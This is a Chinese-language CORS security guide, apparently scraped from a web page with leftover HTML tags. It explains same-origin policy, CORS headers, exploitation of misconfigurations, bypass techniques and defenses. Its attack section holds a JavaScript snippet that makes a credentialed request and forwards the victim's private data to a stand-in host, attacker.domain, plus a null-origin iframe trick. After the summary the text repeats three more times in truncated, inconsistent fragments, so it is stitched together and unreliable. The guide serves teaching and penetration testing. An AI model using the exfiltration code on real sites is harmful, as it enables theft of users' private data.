CORS安全完全指南<\/h1>

1. 介绍<\/h2>
本指南全面收集关于CORS(跨域资源共享)的安全知识，从基础到高级，涵盖攻击与防御两方面。<\/p>

1.1 目标读者<\/h3>

网站管理员<\/li>
程序员<\/li>
渗透测试人员<\/li>
赏金猎人<\/li>

安全专家<\/li> <\/ul>

2. 跨域资源共享(CORS)<\/h2>
CORS是一种放宽浏览器同源策略的机制，允许不同网站和服务器之间通过浏览器进行通信。<\/p>

2.1 同源策略<\/h3>

同源策略是浏览器安全的核心概念，限制不同源的脚本互相访问方法和属性。<\/p>

同源定义<\/strong>：协议、域名、端口三者完全相同。<\/p>

示例分析(以http:\/\/www.example.com\/dir\/page.html<\/code>为基准):<\/p>

URL<\/th> 结果<\/th> 原因<\/th> <\/tr> <\/thead>

http:\/\/www.example.com\/dir2\/other.html<\/code><\/td> 成功<\/td> 同协议、域名、端口<\/td> <\/tr>

http:\/\/www.example.com:81\/dir\/other.html<\/code><\/td> 失败<\/td> 不同端口<\/td> <\/tr>

https:\/\/www.example.com\/dir\/other.html<\/code><\/td> 失败<\/td> 不同协议<\/td> <\/tr>

http:\/\/en.example.com\/dir\/other.html<\/code><\/td>

失败<\/td>

不同主机<\/td> <\/tr> <\/tbody> <\/table>

2.2 CORS机制<\/h3>
CORS通过在HTTP头部添加字段，使客户端有资格跨域访问资源。<\/p>

核心头部字段<\/h4>

Access-Control-Allow-Origin<\/code>: 指定允许跨域访问的源<\/li>

Access-Control-Allow-Credentials<\/code>: 是否允许发送用户凭证(cookie等)<\/li>
<\/ul>
2.2.1 身份数据<\/h4>
当Access-Control-Allow-Credentials<\/code>设为true<\/code>时，浏览器会发送用户凭证。<\/p>
2.2.2 预检请求<\/h4>
对于复杂请求(POST\/PUT\/DELETE等)，浏览器会先发送OPTIONS预检请求，包含：<\/p>

Access-Control-Request-Method<\/code><\/li>
Access-Control-Request-Headers<\/code><\/li>
Origin<\/code><\/li>
<\/ul>
2.2.3 允许多个源<\/h4>

协议建议用空格分隔多个源，但浏览器不支持<\/li>
通配符*<\/code>可以匹配所有域名，但不能与Access-Control-Allow-Credentials: true<\/code>同时使用<\/li>
<\/ul>
2.2.4 其他相关头部<\/h4>

Vary: Origin<\/code>: 当Access-Control-Allow-Origin<\/code>动态生成时应设置此头部<\/li>
<\/ul>
3. 攻击技术<\/h2>
3.1 测试流程<\/h3>

识别<\/strong>：寻找开启CORS的应用(常见于API)<\/li>
分析<\/strong>：测试不同Origin值，观察响应头部<\/li>
利用<\/strong>：根据配置情况实施攻击<\/li>
<\/ol>
3.2 有用户凭据的利用<\/h3>
当Access-Control-Allow-Credentials: true<\/code>时，可窃取用户敏感数据。<\/p>
可利用性分析<\/strong>：<\/p>



Access-Control-Allow-Origin<\/th>
Access-Control-Allow-Credentials<\/th>
可利用性<\/th>
<\/tr>
<\/thead>


https:\/\/attacker.com<\/td>
true<\/td>
是<\/td>
<\/tr>

null<\/td>
true<\/td>
是<\/td>
<\/tr>

*<\/td>
true<\/td>
否<\/td>
<\/tr>
<\/tbody>
<\/table>
攻击示例<\/strong>：<\/p>
var<\/span> req<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>req<\/span>.onload<\/span> =<\/span> reqListener<\/span>;
<\/span><\/span>req<\/span>.open<\/span>("get"<\/span>,"https:\/\/vulnerable.domain\/api\/private-data"<\/span>,true<\/span>);
<\/span><\/span>req<\/span>.withCredentials<\/span> =<\/span> true<\/span>;
<\/span><\/span>req<\/span>.send<\/span>();
<\/span><\/span>
<\/span><\/span>function<\/span> reqListener<\/span>() {
<\/span><\/span>  location<\/span>=<\/span>"\/\/attacker.domain\/log?response="<\/span>+<\/span>this<\/span>.responseText<\/span>;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>3.3 无用户凭据的利用<\/h3>
可利用性分析<\/strong>：<\/p>



Access-Control-Allow-Origin<\/th>
可利用性<\/th>
<\/tr>
<\/thead>


https:\/\/attacker.com<\/td>
是<\/td>
<\/tr>

null<\/td>
是<\/td>
<\/tr>

*<\/td>
是<\/td>
<\/tr>
<\/tbody>
<\/table>
3.3.1 绕过基于IP的身份验证<\/h4>
利用受害者浏览器作为代理访问内网资源。<\/p>
3.3.2 客户端缓存中毒<\/h4>
利用CORS注入恶意头部，污染浏览器缓存。<\/p>
3.3.3 服务器端缓存中毒<\/h4>
通过注入特殊字符的Origin头部，污染服务器缓存。<\/p>
3.4 绕过技术<\/h3>
3.4.1 NULL源<\/h4>
使用沙盒iframe获取null源：<\/p>
<iframe<\/span> sandbox<\/span>=<\/span>"allow-scripts allow-top-navigation allow-forms"<\/span> 
<\/span><\/span>        src<\/span>=<\/span>'data:text\/html,<script>CORS request here<\/script>'<\/span>>
<\/span><\/span><\/iframe<\/span>>
<\/span><\/span><\/code><\/pre>3.4.2 使用目标域名作为子域名<\/h4>
如：https:\/\/target.local.attacker.domain<\/code><\/p>
3.4.3 注册同名域名<\/h4>
如正则表达式^https?:\/\/.*target\.local$<\/code>可被https:\/\/nottarget.local<\/code>绕过<\/p>
3.4.4 控制目标的子域名<\/h4>
接管或利用有漏洞的子域名<\/p>
3.4.5 第三方域名<\/h4>
利用被信任的第三方服务(如Amazon S3)<\/p>
3.4.6 特殊字符绕过<\/h4>
某些浏览器允许特殊字符(如{<\/code>,_<\/code>)绕过验证<\/p>
4. 防御技术<\/h2>
4.1 最佳实践<\/h3>

非必要不开启CORS<\/strong><\/li>
严格定义白名单<\/strong>：避免使用通配符和正则表达式<\/li>
仅允许安全协议<\/strong>：禁用HTTP<\/li>
配置Vary头部<\/strong>：Vary: Origin<\/code><\/li>
避免使用Credentials<\/strong>：除非绝对必要<\/li>
限制允许的方法<\/strong>：通过Access-Control-Allow-Methods<\/code><\/li>
限制缓存时间<\/strong>：使用Access-Control-Max-Age<\/code><\/li>
仅配置必要头部<\/strong>：减少攻击面<\/li>
<\/ol>
4.2 框架配置注意事项<\/h3>
不同框架的CORS默认配置可能不安全，需特别注意：<\/p>

明确设置origin<\/code>和credentials<\/code><\/li>
避免使用宽松的默认值<\/li>
<\/ul>
5. 总结<\/h2>
CORS是强大的跨域通信机制，但错误配置会导致严重安全风险。开发者应严格遵循安全最佳实践，测试人员应全面验证CORS配置的安全性。<\/p>

CORS安全完全指南<\/h1>

1. 介绍<\/h2>
本指南全面收集关于CORS(跨域资源共享)的安全知识，从基础到高级，涵盖攻击与防御两方面。<\/p>

2. 跨域资源共享(CORS)<\/h2>
CORS是一种放宽浏览器同源策略的机制，允许不同网站和服务器之间通过浏览器进行通信。<\/p>

2.2 CORS机制<\/h3>
CORS通过在HTTP头部添加字段，使客户端有资格跨域访问资源。<\/p>

2.2.1 身份数据<\/h4>
当`Access-Control-Allow-Credentials<\/code>设为true<\/code>时，浏览器会发送用户凭证。<\/p>`

3. 攻击技术<\/h2>

3.3.1 绕过基于IP的身份验证<\/h4>
利用受害者浏览器作为代理访问内网资源。<\/p>

3.3.2 客户端缓存中毒<\/h4>
利用CORS注入恶意头部，污染浏览器缓存。<\/p>

3.3.3 服务器端缓存中毒<\/h4>
通过注入特殊字符的Origin头部，污染服务器缓存。<\/p>

3.4 绕过技术<\/h3>

3.4.2 使用目标域名作为子域名<\/h4>
如：`https:\/\/target.local.attacker.domain<\/code><\/p>`

3.4.5 第三方域名<\/h4>
利用被信任的第三方服务(如Amazon S3)<\/p>

3.4.6 特殊字符绕过<\/h4>
某些浏览器允许特殊字符(如`{<\/code>,_<\/code>)绕过验证<\/p>`

5. 总结<\/h2>
CORS是强大的跨域通信机制，但错误配置会导致严重安全风险。开发者应严格遵循安全最佳实践，测试人员应全面验证CORS配置的安全性。<\/p>

CORS安全完全指南<\/h1>

1. 介绍<\/h2> 本指南全面收集关于CORS(跨域资源共享)的安全知识，从基础到高级，涵盖攻击与防御两方面。<\/p>

2. 跨域资源共享(CORS)<\/h2> CORS是一种放宽浏览器同源策略的机制，允许不同网站和服务器之间通过浏览器进行通信。<\/p>

2.2 CORS机制<\/h3> CORS通过在HTTP头部添加字段，使客户端有资格跨域访问资源。<\/p>

2.2.1 身份数据<\/h4> 当Access-Control-Allow-Credentials<\/code>设为true<\/code>时，浏览器会发送用户凭证。<\/p>

3. 攻击技术<\/h2>

3.3.1 绕过基于IP的身份验证<\/h4> 利用受害者浏览器作为代理访问内网资源。<\/p>

3.3.2 客户端缓存中毒<\/h4> 利用CORS注入恶意头部，污染浏览器缓存。<\/p>

3.3.3 服务器端缓存中毒<\/h4> 通过注入特殊字符的Origin头部，污染服务器缓存。<\/p>

3.4 绕过技术<\/h3>

3.4.2 使用目标域名作为子域名<\/h4> 如：https:\/\/target.local.attacker.domain<\/code><\/p>

3.4.5 第三方域名<\/h4> 利用被信任的第三方服务(如Amazon S3)<\/p>

3.4.6 特殊字符绕过<\/h4> 某些浏览器允许特殊字符(如{<\/code>,_<\/code>)绕过验证<\/p>

5. 总结<\/h2> CORS是强大的跨域通信机制，但错误配置会导致严重安全风险。开发者应严格遵循安全最佳实践，测试人员应全面验证CORS配置的安全性。<\/p>

1. 介绍<\/h2>
本指南全面收集关于CORS(跨域资源共享)的安全知识，从基础到高级，涵盖攻击与防御两方面。<\/p>

2. 跨域资源共享(CORS)<\/h2>
CORS是一种放宽浏览器同源策略的机制，允许不同网站和服务器之间通过浏览器进行通信。<\/p>

2.2 CORS机制<\/h3>
CORS通过在HTTP头部添加字段，使客户端有资格跨域访问资源。<\/p>

2.2.1 身份数据<\/h4>
当`Access-Control-Allow-Credentials<\/code>设为true<\/code>时，浏览器会发送用户凭证。<\/p>`

3.3.1 绕过基于IP的身份验证<\/h4>
利用受害者浏览器作为代理访问内网资源。<\/p>

3.3.2 客户端缓存中毒<\/h4>
利用CORS注入恶意头部，污染浏览器缓存。<\/p>

3.3.3 服务器端缓存中毒<\/h4>
通过注入特殊字符的Origin头部，污染服务器缓存。<\/p>

3.4.2 使用目标域名作为子域名<\/h4>
如：`https:\/\/target.local.attacker.domain<\/code><\/p>`

3.4.5 第三方域名<\/h4>
利用被信任的第三方服务(如Amazon S3)<\/p>

3.4.6 特殊字符绕过<\/h4>
某些浏览器允许特殊字符(如`{<\/code>,_<\/code>)绕过验证<\/p>`

5. 总结<\/h2>
CORS是强大的跨域通信机制，但错误配置会导致严重安全风险。开发者应严格遵循安全最佳实践，测试人员应全面验证CORS配置的安全性。<\/p>